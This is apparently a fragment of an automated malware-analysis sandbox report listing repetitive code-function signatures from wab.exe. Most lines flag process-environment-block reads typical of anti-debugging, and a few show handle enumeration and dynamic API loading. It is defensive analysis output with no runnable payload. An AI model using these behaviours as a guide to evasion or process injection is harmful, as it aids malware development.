              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 16_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,16_2_0040DD85
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 16_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW,16_2_004044A4
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_21CB4AB4 mov eax, dword ptr fs:[00000030h]11_2_21CB4AB4
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A052A0 mov eax, dword ptr fs:[00000030h]27_2_22A052A0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A052A0 mov eax, dword ptr fs:[00000030h]27_2_22A052A0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A052A0 mov eax, dword ptr fs:[00000030h]27_2_22A052A0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A052A0 mov eax, dword ptr fs:[00000030h]27_2_22A052A0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A872A0 mov eax, dword ptr fs:[00000030h]27_2_22A872A0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A872A0 mov eax, dword ptr fs:[00000030h]27_2_22A872A0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A862A0 mov eax, dword ptr fs:[00000030h]27_2_22A862A0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A862A0 mov ecx, dword ptr fs:[00000030h]27_2_22A862A0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A862A0 mov eax, dword ptr fs:[00000030h]27_2_22A862A0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A862A0 mov eax, dword ptr fs:[00000030h]27_2_22A862A0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A862A0 mov eax, dword ptr fs:[00000030h]27_2_22A862A0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A862A0 mov eax, dword ptr fs:[00000030h]27_2_22A862A0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22AB92A6 mov eax, dword ptr fs:[00000030h]27_2_22AB92A6
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22AB92A6 mov eax, dword ptr fs:[00000030h]27_2_22AB92A6
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22AB92A6 mov eax, dword ptr fs:[00000030h]27_2_22AB92A6
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22AB92A6 mov eax, dword ptr fs:[00000030h]27_2_22AB92A6
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A792BC mov eax, dword ptr fs:[00000030h]27_2_22A792BC
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A792BC mov eax, dword ptr fs:[00000030h]27_2_22A792BC
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A792BC mov ecx, dword ptr fs:[00000030h]27_2_22A792BC
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A792BC mov ecx, dword ptr fs:[00000030h]27_2_22A792BC
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A70283 mov eax, dword ptr fs:[00000030h]27_2_22A70283
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A70283 mov eax, dword ptr fs:[00000030h]27_2_22A70283
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A70283 mov eax, dword ptr fs:[00000030h]27_2_22A70283
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A2E284 mov eax, dword ptr fs:[00000030h]27_2_22A2E284
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A2E284 mov eax, dword ptr fs:[00000030h]27_2_22A2E284
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22AC5283 mov eax, dword ptr fs:[00000030h]27_2_22AC5283
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A2329E mov eax, dword ptr fs:[00000030h]27_2_22A2329E
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A2329E mov eax, dword ptr fs:[00000030h]27_2_22A2329E
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A002E1 mov eax, dword ptr fs:[00000030h]27_2_22A002E1
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A002E1 mov eax, dword ptr fs:[00000030h]27_2_22A002E1
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A002E1 mov eax, dword ptr fs:[00000030h]27_2_22A002E1
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22AA12ED mov eax, dword ptr fs:[00000030h]27_2_22AA12ED
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22AA12ED mov eax, dword ptr fs:[00000030h]27_2_22AA12ED
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22AA12ED mov eax, dword ptr fs:[00000030h]27_2_22AA12ED
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22AA12ED mov eax, dword ptr fs:[00000030h]27_2_22AA12ED
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22AA12ED mov eax, dword ptr fs:[00000030h]27_2_22AA12ED
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22AA12ED mov eax, dword ptr fs:[00000030h]27_2_22AA12ED
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22AA12ED mov eax, dword ptr fs:[00000030h]27_2_22AA12ED
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22AA12ED mov eax, dword ptr fs:[00000030h]27_2_22AA12ED
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22AA12ED mov eax, dword ptr fs:[00000030h]27_2_22AA12ED
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22AA12ED mov eax, dword ptr fs:[00000030h]27_2_22AA12ED
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22AA12ED mov eax, dword ptr fs:[00000030h]27_2_22AA12ED
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22AA12ED mov eax, dword ptr fs:[00000030h]27_2_22AA12ED
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22AA12ED mov eax, dword ptr fs:[00000030h]27_2_22AA12ED
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22AA12ED mov eax, dword ptr fs:[00000030h]27_2_22AA12ED
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_229EB2D3 mov eax, dword ptr fs:[00000030h]27_2_229EB2D3
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_229EB2D3 mov eax, dword ptr fs:[00000030h]27_2_229EB2D3
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_229EB2D3 mov eax, dword ptr fs:[00000030h]27_2_229EB2D3
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22AC52E2 mov eax, dword ptr fs:[00000030h]27_2_22AC52E2
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22AAF2F8 mov eax, dword ptr fs:[00000030h]27_2_22AAF2F8
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_229F92C5 mov eax, dword ptr fs:[00000030h]27_2_229F92C5
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_229F92C5 mov eax, dword ptr fs:[00000030h]27_2_229F92C5
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_229FA2C3 mov eax, dword ptr fs:[00000030h]27_2_229FA2C3
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_229FA2C3 mov eax, dword ptr fs:[00000030h]27_2_229FA2C3
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_229FA2C3 mov eax, dword ptr fs:[00000030h]27_2_229FA2C3
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_229FA2C3 mov eax, dword ptr fs:[00000030h]27_2_229FA2C3
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_229FA2C3 mov eax, dword ptr fs:[00000030h]27_2_229FA2C3
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_229E92FF mov eax, dword ptr fs:[00000030h]27_2_229E92FF
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A1B2C0 mov eax, dword ptr fs:[00000030h]27_2_22A1B2C0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A1B2C0 mov eax, dword ptr fs:[00000030h]27_2_22A1B2C0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A1B2C0 mov eax, dword ptr fs:[00000030h]27_2_22A1B2C0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A1B2C0 mov eax, dword ptr fs:[00000030h]27_2_22A1B2C0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A1B2C0 mov eax, dword ptr fs:[00000030h]27_2_22A1B2C0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A1B2C0 mov eax, dword ptr fs:[00000030h]27_2_22A1B2C0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A1B2C0 mov eax, dword ptr fs:[00000030h]27_2_22A1B2C0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A1F2D0 mov eax, dword ptr fs:[00000030h]27_2_22A1F2D0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A1F2D0 mov eax, dword ptr fs:[00000030h]27_2_22A1F2D0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22AC5227 mov eax, dword ptr fs:[00000030h]27_2_22AC5227
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_229E823B mov eax, dword ptr fs:[00000030h]27_2_229E823B
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A27208 mov eax, dword ptr fs:[00000030h]27_2_22A27208
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A27208 mov eax, dword ptr fs:[00000030h]27_2_22A27208
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22ABD26B mov eax, dword ptr fs:[00000030h]27_2_22ABD26B
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22ABD26B mov eax, dword ptr fs:[00000030h]27_2_22ABD26B
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_229F6259 mov eax, dword ptr fs:[00000030h]27_2_229F6259
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_229EA250 mov eax, dword ptr fs:[00000030h]27_2_229EA250
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A31270 mov eax, dword ptr fs:[00000030h]27_2_22A31270
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A31270 mov eax, dword ptr fs:[00000030h]27_2_22A31270
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A19274 mov eax, dword ptr fs:[00000030h]27_2_22A19274
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_229E9240 mov eax, dword ptr fs:[00000030h]27_2_229E9240
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_229E9240 mov eax, dword ptr fs:[00000030h]27_2_229E9240
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22AA0274 mov eax, dword ptr fs:[00000030h]27_2_22AA0274
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22AA0274 mov eax, dword ptr fs:[00000030h]27_2_22AA0274
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22AA0274 mov eax, dword ptr fs:[00000030h]27_2_22AA0274
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22AA0274 mov eax, dword ptr fs:[00000030h]27_2_22AA0274
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22AA0274 mov eax, dword ptr fs:[00000030h]27_2_22AA0274
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22AA0274 mov eax, dword ptr fs:[00000030h]27_2_22AA0274
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22AA0274 mov eax, dword ptr fs:[00000030h]27_2_22AA0274
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22AA0274 mov eax, dword ptr fs:[00000030h]27_2_22AA0274
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22AA0274 mov eax, dword ptr fs:[00000030h]27_2_22AA0274
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22AA0274 mov eax, dword ptr fs:[00000030h]27_2_22AA0274
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22AA0274 mov eax, dword ptr fs:[00000030h]27_2_22AA0274
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22AA0274 mov eax, dword ptr fs:[00000030h]27_2_22AA0274
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A78243 mov eax, dword ptr fs:[00000030h]27_2_22A78243
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A78243 mov ecx, dword ptr fs:[00000030h]27_2_22A78243
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A2724D mov eax, dword ptr fs:[00000030h]27_2_22A2724D
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_229E826B mov eax, dword ptr fs:[00000030h]27_2_229E826B
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A7D250 mov ecx, dword ptr fs:[00000030h]27_2_22A7D250
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22AAB256 mov eax, dword ptr fs:[00000030h]27_2_22AAB256
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22AAB256 mov eax, dword ptr fs:[00000030h]27_2_22AAB256
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_229F4260 mov eax, dword ptr fs:[00000030h]27_2_229F4260
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_229F4260 mov eax, dword ptr fs:[00000030h]27_2_229F4260
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_229F4260 mov eax, dword ptr fs:[00000030h]27_2_229F4260
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A233A0 mov eax, dword ptr fs:[00000030h]27_2_22A233A0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A233A0 mov eax, dword ptr fs:[00000030h]27_2_22A233A0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A133A5 mov eax, dword ptr fs:[00000030h]27_2_22A133A5
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_229E8397 mov eax, dword ptr fs:[00000030h]27_2_229E8397
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_229E8397 mov eax, dword ptr fs:[00000030h]27_2_229E8397
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_229E8397 mov eax, dword ptr fs:[00000030h]27_2_229E8397
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_229EE388 mov eax, dword ptr fs:[00000030h]27_2_229EE388
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_229EE388 mov eax, dword ptr fs:[00000030h]27_2_229EE388
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_229EE388 mov eax, dword ptr fs:[00000030h]27_2_229EE388
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A1438F mov eax, dword ptr fs:[00000030h]27_2_22A1438F
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A1438F mov eax, dword ptr fs:[00000030h]27_2_22A1438F
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22AC539D mov eax, dword ptr fs:[00000030h]27_2_22AC539D
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A4739A mov eax, dword ptr fs:[00000030h]27_2_22A4739A
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A4739A mov eax, dword ptr fs:[00000030h]27_2_22A4739A
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A003E9 mov eax, dword ptr fs:[00000030h]27_2_22A003E9
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A003E9 mov eax, dword ptr fs:[00000030h]27_2_22A003E9
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A003E9 mov eax, dword ptr fs:[00000030h]27_2_22A003E9
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A003E9 mov eax, dword ptr fs:[00000030h]27_2_22A003E9
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A003E9 mov eax, dword ptr fs:[00000030h]27_2_22A003E9
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A003E9 mov eax, dword ptr fs:[00000030h]27_2_22A003E9
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A003E9 mov eax, dword ptr fs:[00000030h]27_2_22A003E9
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A003E9 mov eax, dword ptr fs:[00000030h]27_2_22A003E9
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22AAF3E6 mov eax, dword ptr fs:[00000030h]27_2_22AAF3E6
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22AC53FC mov eax, dword ptr fs:[00000030h]27_2_22AC53FC
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A0E3F0 mov eax, dword ptr fs:[00000030h]27_2_22A0E3F0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A0E3F0 mov eax, dword ptr fs:[00000030h]27_2_22A0E3F0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A0E3F0 mov eax, dword ptr fs:[00000030h]27_2_22A0E3F0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A263FF mov eax, dword ptr fs:[00000030h]27_2_22A263FF
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_229FA3C0 mov eax, dword ptr fs:[00000030h]27_2_229FA3C0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_229FA3C0 mov eax, dword ptr fs:[00000030h]27_2_229FA3C0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_229FA3C0 mov eax, dword ptr fs:[00000030h]27_2_229FA3C0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_229FA3C0 mov eax, dword ptr fs:[00000030h]27_2_229FA3C0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_229FA3C0 mov eax, dword ptr fs:[00000030h]27_2_229FA3C0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_229FA3C0 mov eax, dword ptr fs:[00000030h]27_2_229FA3C0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_229F83C0 mov eax, dword ptr fs:[00000030h]27_2_229F83C0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_229F83C0 mov eax, dword ptr fs:[00000030h]27_2_229F83C0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_229F83C0 mov eax, dword ptr fs:[00000030h]27_2_229F83C0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_229F83C0 mov eax, dword ptr fs:[00000030h]27_2_229F83C0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22AAC3CD mov eax, dword ptr fs:[00000030h]27_2_22AAC3CD
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A763C0 mov eax, dword ptr fs:[00000030h]27_2_22A763C0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22AAB3D0 mov ecx, dword ptr fs:[00000030h]27_2_22AAB3D0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22AB132D mov eax, dword ptr fs:[00000030h]27_2_22AB132D
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22AB132D mov eax, dword ptr fs:[00000030h]27_2_22AB132D
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A1F32A mov eax, dword ptr fs:[00000030h]27_2_22A1F32A
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_229EC310 mov ecx, dword ptr fs:[00000030h]27_2_229EC310
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A2A30B mov eax, dword ptr fs:[00000030h]27_2_22A2A30B
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A2A30B mov eax, dword ptr fs:[00000030h]27_2_22A2A30B
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A2A30B mov eax, dword ptr fs:[00000030h]27_2_22A2A30B
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A7930B mov eax, dword ptr fs:[00000030h]27_2_22A7930B
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A7930B mov eax, dword ptr fs:[00000030h]27_2_22A7930B
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A7930B mov eax, dword ptr fs:[00000030h]27_2_22A7930B
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_229E7330 mov eax, dword ptr fs:[00000030h]27_2_229E7330
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A10310 mov ecx, dword ptr fs:[00000030h]27_2_22A10310
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_229E9353 mov eax, dword ptr fs:[00000030h]27_2_229E9353
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_229E9353 mov eax, dword ptr fs:[00000030h]27_2_229E9353
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22AAF367 mov eax, dword ptr fs:[00000030h]27_2_22AAF367
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_229ED34C mov eax, dword ptr fs:[00000030h]27_2_229ED34C
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_229ED34C mov eax, dword ptr fs:[00000030h]27_2_229ED34C
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A9437C mov eax, dword ptr fs:[00000030h]27_2_22A9437C
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22AC5341 mov eax, dword ptr fs:[00000030h]27_2_22AC5341
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A72349 mov eax, dword ptr fs:[00000030h]27_2_22A72349
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A72349 mov eax, dword ptr fs:[00000030h]27_2_22A72349
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A72349 mov eax, dword ptr fs:[00000030h]27_2_22A72349
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A72349 mov eax, dword ptr fs:[00000030h]27_2_22A72349
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A72349 mov eax, dword ptr fs:[00000030h]27_2_22A72349
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A72349 mov eax, dword ptr fs:[00000030h]27_2_22A72349
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A72349 mov eax, dword ptr fs:[00000030h]27_2_22A72349
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A72349 mov eax, dword ptr fs:[00000030h]27_2_22A72349
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A72349 mov eax, dword ptr fs:[00000030h]27_2_22A72349
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A72349 mov eax, dword ptr fs:[00000030h]27_2_22A72349
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A72349 mov eax, dword ptr fs:[00000030h]27_2_22A72349
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A72349 mov eax, dword ptr fs:[00000030h]27_2_22A72349
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A72349 mov eax, dword ptr fs:[00000030h]27_2_22A72349
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A72349 mov eax, dword ptr fs:[00000030h]27_2_22A72349
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A72349 mov eax, dword ptr fs:[00000030h]27_2_22A72349
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_229F7370 mov eax, dword ptr fs:[00000030h]27_2_229F7370
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_229F7370 mov eax, dword ptr fs:[00000030h]27_2_229F7370
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_229F7370 mov eax, dword ptr fs:[00000030h]27_2_229F7370
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22ABA352 mov eax, dword ptr fs:[00000030h]27_2_22ABA352
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A7035C mov eax, dword ptr fs:[00000030h]27_2_22A7035C
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A7035C mov eax, dword ptr fs:[00000030h]27_2_22A7035C
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A7035C mov eax, dword ptr fs:[00000030h]27_2_22A7035C
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A7035C mov ecx, dword ptr fs:[00000030h]27_2_22A7035C
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A7035C mov eax, dword ptr fs:[00000030h]27_2_22A7035C
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A7035C mov eax, dword ptr fs:[00000030h]27_2_22A7035C
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A880A8 mov eax, dword ptr fs:[00000030h]27_2_22A880A8
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_229F5096 mov eax, dword ptr fs:[00000030h]27_2_229F5096
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_229ED08D mov eax, dword ptr fs:[00000030h]27_2_229ED08D
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22AB60B8 mov eax, dword ptr fs:[00000030h]27_2_22AB60B8
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22AB60B8 mov ecx, dword ptr fs:[00000030h]27_2_22AB60B8
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_229F208A mov eax, dword ptr fs:[00000030h]27_2_229F208A
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A7D080 mov eax, dword ptr fs:[00000030h]27_2_22A7D080
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A7D080 mov eax, dword ptr fs:[00000030h]27_2_22A7D080
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A1D090 mov eax, dword ptr fs:[00000030h]27_2_22A1D090
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A1D090 mov eax, dword ptr fs:[00000030h]27_2_22A1D090
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A2909C mov eax, dword ptr fs:[00000030h]27_2_22A2909C
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A150E4 mov eax, dword ptr fs:[00000030h]27_2_22A150E4
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A150E4 mov ecx, dword ptr fs:[00000030h]27_2_22A150E4
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A760E0 mov eax, dword ptr fs:[00000030h]27_2_22A760E0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A320F0 mov ecx, dword ptr fs:[00000030h]27_2_22A320F0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A070C0 mov eax, dword ptr fs:[00000030h]27_2_22A070C0
